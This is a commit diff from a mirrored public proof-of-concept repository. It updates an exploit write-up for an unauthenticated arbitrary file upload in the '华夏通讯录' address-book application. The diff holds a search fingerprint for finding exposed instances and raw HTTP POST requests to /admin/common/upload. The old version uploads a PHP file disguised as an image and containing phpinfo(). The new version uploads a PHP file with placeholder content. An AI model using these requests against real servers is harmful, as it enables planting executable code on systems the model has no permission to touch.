mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-06-20 18:01:14 +00:00
Update 华夏通讯录存在前台upload任意文件上传.md
This commit is contained in:
parent
531f3aaf4f
commit
6ffb709b0e
@ -11,32 +11,22 @@ icon_hash="1403225079" && ":) APPV1"
|
|||||||
## poc
|
## poc
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
POST /admin/common/upload HTTP/1.1
|
POST /admin/common/upload HTTP/2
|
||||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
Host: 127.0.0.1
|
||||||
Accept-Encoding: gzip, deflate, br, zstd
|
Content-Type: multipart/form-data; boundary=---------------------------289666258334735365651210512949
|
||||||
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
|
||||||
Cache-Control: max-age=0
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||||||
Connection: keep-alive
|
Accept-Encoding: gzip, deflate
|
||||||
Content-Length: 197
|
X-Requested-With: XMLHttpRequest
|
||||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIGQdzBsWlq43t3JA
|
Content-Length: 218
|
||||||
Cookie: PHPSESSID=719psss6jnv9112q6spakfmt32; md5=201920; visitor_source=http%3A%2F%2F127.0.0.1%3A81%2Findex
|
|
||||||
Host: 127.0.0.1:81
|
|
||||||
Origin: http://127.0.0.1:81
|
|
||||||
Referer: http://127.0.0.1:81/admin/common/upload
|
|
||||||
Sec-Fetch-Dest: document
|
|
||||||
Sec-Fetch-Mode: navigate
|
|
||||||
Sec-Fetch-Site: none
|
|
||||||
Upgrade-Insecure-Requests: 1
|
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
|
|
||||||
sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
|
|
||||||
sec-ch-ua-mobile: ?0
|
|
||||||
sec-ch-ua-platform: "Windows"
|
|
||||||
sec-fetch-user: ?1
|
|
||||||
|
|
||||||
------WebKitFormBoundary03rNBzFMIytvpWhy
|
-----------------------------289666258334735365651210512949
|
||||||
Content-Disposition: form-data; name="file"; filename="1.php"
|
Content-Disposition: form-data; name="file"; filename="1.php"
|
||||||
Content-Type: image/jpeg
|
Content-Type: image/png
|
||||||
|
|
||||||
<?php phpinfo();?>
|
1111
|
||||||
------WebKitFormBoundary03rNBzFMIytvpWhy--
|
-----------------------------289666258334735365651210512949--
|
||||||
```
|
```
|
||||||
|
路径返回包中
|
||||||
|

|
||||||
|
|
||||||
|
Loading…
x
Reference in New Issue
Block a user